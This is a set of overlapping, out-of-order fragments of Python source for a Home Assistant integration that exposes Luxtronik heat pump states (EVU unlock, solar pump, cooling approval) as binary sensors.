"HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None, ) -> None:",
"deviceInfoDomesticWater is not None: text_solar_pump = get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik,",
"= deviceInfo self._attr_name = name self._attr_icon = icon self._attr_device_class = device_class self._attr_state_class =",
"LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ]",
"entities = [] if sensors: # region Legacy part: for sensor_cfg in sensors:",
"[ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"]",
"deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None: text_solar_pump = get_sensor_text(lang, 'solar_pump') entities",
"Build Sensor names with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked')",
"region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All(",
"if sensors: # region Legacy part: for sensor_cfg in sensors: sensor_id = sensor_cfg[CONF_ID]",
"import Any, Final import homeassistant.helpers.config_validation as cv import voluptuous as vol from homeassistant.components.binary_sensor",
"self._attr_icon = icon self._attr_device_class = device_class self._attr_state_class = state_class self._attr_entity_category = entity_category self._invert",
"= sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name if not",
"Sensor names with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities",
"\"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id) entities",
"= get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock',",
"is not None: text_solar_pump = get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater,",
"\"\"\"Representation of a Luxtronik binary sensor.\"\"\" def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice,",
"name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None: text_solar_pump",
"entity_id) entities += [ LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type,",
"value = self._luxtronik.get_value(self._sensor_key) return not value if self._invert else value def update(self): \"\"\"Get",
"import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant",
"str = None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool = False ) ->",
"homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity import",
"entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling",
"deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors",
"Any, Final import homeassistant.helpers.config_validation as cv import voluptuous as vol from homeassistant.components.binary_sensor import",
"= None, ) -> None: \"\"\"Set up a Luxtronik binary sensor from yaml",
"hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities = [] if sensors: #",
"* from .helpers.helper import get_sensor_text from .luxtronik_device import LuxtronikDevice # endregion Imports #",
"import RestoreEntity from homeassistant.util import slugify from .const import * from .helpers.helper import",
"homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util import slugify from .const import * from .helpers.helper",
") -> None: \"\"\"Set up a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType:",
"config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None, ) -> None: \"\"\"Set",
"hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with local language: lang =",
"icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a",
"Constants # region Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback,",
"discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False",
"LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater",
"else: LOGGER.warning( \"Invalid Luxtronik ID %s in group %s\", sensor_id, group, ) #",
"homeassistant.util import slugify from .const import * from .helpers.helper import get_sensor_text from .luxtronik_device",
"Any] = None, ) -> None: \"\"\"Set up a Luxtronik binary sensor from",
"binary sensor.\"\"\" self.hass = hass self._luxtronik = luxtronik self._sensor_key = sensor_key self.entity_id =",
"-> None: \"\"\"Set up a Luxtronik binary sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType:",
"if deviceInfoCooling is not None: text_approval_cooling = get_sensor_text(lang, 'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass,",
"a new Luxtronik binary sensor.\"\"\" self.hass = hass self._luxtronik = luxtronik self._sensor_key =",
"= sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id)",
"Luxtronik ID %s in group %s\", sensor_id, group, ) # endregion Legacy part:",
"HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set up a Luxtronik sensor",
"LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name: str, icon: str, device_class: str,",
"states.\"\"\" # region Imports import logging from typing import Any, Final import homeassistant.helpers.config_validation",
"sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if",
"cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string,",
"invert_state: bool = False ) -> None: \"\"\"Initialize a new Luxtronik binary sensor.\"\"\"",
"\"\"\"Support for Luxtronik heatpump binary states.\"\"\" # region Imports import logging from typing",
"self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo self._attr_name",
"= name self._attr_icon = icon self._attr_device_class = device_class self._attr_state_class = state_class self._attr_entity_category =",
"sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids",
"\"\"\"Get the latest status and use it to update our sensor state.\"\"\" self._luxtronik.update()",
"False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with local",
"= \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\", entity_id)",
"LOGGER.warning( \"Invalid Luxtronik ID %s in group %s\", sensor_id, group, ) # endregion",
"luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class",
"= device_class self._attr_state_class = state_class self._attr_entity_category = entity_category self._invert = invert_state @property def",
"LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False # use_legacy_sensor_ids",
"ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant from",
"'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ]",
"vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ),",
"str, device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool",
"icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID %s",
"endregion Imports # region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [",
"from typing import Any, Final import homeassistant.helpers.config_validation as cv import voluptuous as vol",
"deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor names with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES)",
"# region Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info:",
"ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not",
"CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo from",
"homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID,",
"def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str,",
"], ) } ) # endregion Constants # region Setup async def async_setup_platform(",
"sensor_key=f\"{group}.{sensor_id}\", unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid",
"if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating =",
"%s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return",
"value if self._invert else value def update(self): \"\"\"Get the latest status and use",
"use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling",
"self._invert else value def update(self): \"\"\"Get the latest status and use it to",
"class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik binary sensor.\"\"\" def __init__( self, hass:",
"Luxtronik heatpump binary states.\"\"\" # region Imports import logging from typing import Any,",
"sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik:",
"async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set",
"%s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\")",
"+= [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) #",
"= luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name if not sensor_cfg.get( CONF_FRIENDLY_NAME) else",
"sensor_id, group, ) # endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant,",
"hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform no luxtronik!\") return False # use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"]",
"None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool = False ) -> None: \"\"\"Initialize",
"import logging from typing import Any, Final import homeassistant.helpers.config_validation as cv import voluptuous",
"if self._invert else value def update(self): \"\"\"Get the latest status and use it",
"if not sensor_cfg.get( CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else",
"if '.' in sensor_id: group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group =",
"[ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME):",
"vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID):",
"local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass,",
"of a Luxtronik binary sensor.\"\"\" def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo:",
"invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID %s in group %s\", sensor_id, group,",
"device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik",
"vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean, } ], ) } ) # endregion Constants",
"import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA, BinarySensorEntity) from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry",
"true if binary sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value if",
".helpers.helper import get_sensor_text from .luxtronik_device import LuxtronikDevice # endregion Imports # region Constants",
"icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None: text_solar_pump =",
"config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN)",
"self.hass = hass self._luxtronik = luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id",
"luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo",
"entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities)",
"homeassistant.helpers.config_validation as cv import voluptuous as vol from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK, DEVICE_CLASS_RUNNING, PLATFORM_SCHEMA,",
"Legacy part: for sensor_cfg in sensors: sensor_id = sensor_cfg[CONF_ID] if '.' in sensor_id:",
"config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked',",
"luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo",
"LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of a Luxtronik binary sensor.\"\"\" def __init__( self, hass: HomeAssistant,",
"icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if deviceInfoCooling is not None: text_approval_cooling =",
"ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik:",
"LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING) ] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] if",
"Luxtronik binary sensor.\"\"\" def __init__( self, hass: HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key:",
"region Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str,",
"device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES = None, invert_state: bool =",
"self._attr_entity_category = entity_category self._invert = invert_state @property def is_on(self): \"\"\"Return true if binary",
"str, name: str, icon: str, device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES",
"LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup",
"sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value if self._invert else value",
"sensors: sensor_id = sensor_cfg[CONF_ID] if '.' in sensor_id: group = sensor_id.split('.')[0] sensor_id =",
"None: text_solar_pump = get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump',",
"else sensor_cfg.get(CONF_FRIENDLY_NAME) entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create",
"from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON,",
"LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if",
"text_solar_pump = get_sensor_text(lang, 'solar_pump') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP, unique_id='solar_pump', name=text_solar_pump,",
"def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None,",
"name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] async_add_entities(entities) # endregion Setup class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity): \"\"\"Representation of",
"\"\"\"Return true if binary sensor is on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value",
"a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice =",
"AddEntitiesCallback from homeassistant.helpers.typing import ConfigType from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.util import slugify",
"%s\", sensor_id, group, ) # endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass:",
"up a Luxtronik sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice",
"luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name: str, icon: str, device_class:",
"AddEntitiesCallback, discovery_info: dict[str, Any] = None, ) -> None: \"\"\"Set up a Luxtronik",
"False ) -> None: \"\"\"Initialize a new Luxtronik binary sensor.\"\"\" self.hass = hass",
"self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id self._attr_device_info = deviceInfo self._attr_name = name self._attr_icon",
"with local language: lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [",
"= icon self._attr_device_class = device_class self._attr_state_class = state_class self._attr_entity_category = entity_category self._invert =",
"= sensor_cfg[CONF_ID] if '.' in sensor_id: group = sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else:",
"unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None:",
"deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] deviceInfoCooling = hass.data[f\"{DOMAIN}_DeviceInfo_Cooling\"] sensors = config.get(CONF_SENSORS) entities = [] if",
"[CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string, vol.Optional(CONF_FRIENDLY_NAME): cv.string, vol.Optional(CONF_ICON): cv.string, vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean,",
"luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater",
"hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None, ) ->",
"endregion Constants # region Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities:",
"group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name if",
"LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if",
"= config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES) text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED,",
"region Imports import logging from typing import Any, Final import homeassistant.helpers.config_validation as cv",
"sensor from ConfigEntry.\"\"\" LOGGER.info( f\"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s\", config_entry) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if",
"get_sensor_text(lang, 'approval_cooling') entities += [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl', unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK)",
"= PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS,",
"on.\"\"\" value = self._luxtronik.get_value(self._sensor_key) return not value if self._invert else value def update(self):",
"from homeassistant.config_entries import ConfigEntry from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID, CONF_SENSORS) from homeassistant.core",
"async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None, )",
"name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get( sensor.measurement_type, DEFAULT_DEVICE_CLASS), state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE)) ] else: LOGGER.warning( \"Invalid Luxtronik ID",
"sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name =",
"hass self._luxtronik = luxtronik self._sensor_key = sensor_key self.entity_id = ENTITY_ID_FORMAT.format(f\"{DOMAIN}_{unique_id}\") self._attr_unique_id = self.entity_id",
"Setup async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any]",
"device_class=DEVICE_CLASS_LOCK) ] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] if deviceInfoDomesticWater is not None: text_solar_pump = get_sensor_text(lang,",
"- discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice = hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_platform",
"no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"] # Build Sensor",
"get_sensor_text(lang, 'evu_unlocked') entities = [ LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED, unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock', device_class=DEVICE_CLASS_LOCK)",
"entity_id = \"luxtronik.{}\".format(slugify(name)) # if use_legacy_sensor_ids else None LOGGER.info( \"binary_sensor.async_setup_platform create entity_id: '%s'\",",
"PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS,",
"str, icon: str, device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES = None,",
"None, invert_state: bool = False ) -> None: \"\"\"Initialize a new Luxtronik binary",
"from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s\", config, discovery_info) luxtronik: LuxtronikDevice",
"None: \"\"\"Set up a Luxtronik binary sensor from yaml config.\"\"\" LOGGER.info(f\"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s",
"def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set up",
